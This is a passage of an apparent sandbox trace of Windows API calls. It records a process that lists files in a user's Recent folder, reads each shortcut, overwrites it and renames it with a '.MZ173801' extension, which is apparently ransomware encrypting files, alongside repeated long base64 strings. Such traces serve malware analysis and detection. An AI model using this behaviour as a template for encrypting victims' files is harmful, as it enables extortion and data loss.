lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\torEQ-P8Pc0pag.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\toreq-p8pc0pag.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9bc9921, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9bc9921, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe9bc9921, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x42c)) returned 1 [0111.739] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.739] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.739] GetCurrentThreadId () returned 0x1358 [0111.739] GetCurrentThreadId () returned 0x1358 [0111.739] GetCurrentThreadId () returned 0x1358 [0111.739] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.740] GetCurrentThreadId () returned 0x1358 [0111.740] GetCurrentThreadId () returned 0x1358 [0111.740] GetCurrentThreadId () returned 0x1358 [0111.740] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\torEQ-P8Pc0pag.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\toreq-p8pc0pag.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.740] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.740] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.740] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x42c [0111.740] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.740] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x42c, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x42c, lpOverlapped=0x0) returned 1 [0111.741] CloseHandle (hObject=0x3f4) returned 1 [0111.741] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\torEQ-P8Pc0pag.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\toreq-p8pc0pag.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.742] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x42c, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x42c, lpOverlapped=0x0) returned 1 [0111.743] CloseHandle (hObject=0x3f4) returned 1 [0111.744] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\torEQ-P8Pc0pag.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\toreq-p8pc0pag.flv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\torEQ-P8Pc0pag.flv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\toreq-p8pc0pag.flv.lnk.mz173801")) returned 1 [0111.744] GetCurrentThreadId () returned 0x1358 [0111.744] GetCurrentThreadId () returned 0x1358 [0111.744] GetCurrentThreadId () returned 0x1358 [0111.744] GetCurrentThreadId () returned 0x1358 [0111.744] GetCurrentThreadId () returned 0x1358 [0111.744] GetCurrentThreadId () returned 0x1358 [0111.744] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x742d5d25, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x742d5d25, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x742d5d25, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="TrIgUDcr5i55m8wcE.lnk", cAlternateFileName="TRIGUD~1.LNK")) returned 1 [0111.744] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.744] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.744] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TrIgUDcr5i55m8wcE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\trigudcr5i55m8wce.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x742d5d25, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x742d5d25, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x742d5d25, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52a)) returned 1 [0111.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.745] GetCurrentThreadId () returned 0x1358 [0111.745] GetCurrentThreadId () returned 0x1358 [0111.745] GetCurrentThreadId () returned 0x1358 [0111.746] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.746] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.746] GetCurrentThreadId () returned 0x1358 [0111.746] GetCurrentThreadId () returned 0x1358 [0111.746] GetCurrentThreadId () returned 0x1358 [0111.746] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TrIgUDcr5i55m8wcE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\trigudcr5i55m8wce.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.746] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.746] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.746] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x52a [0111.746] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, 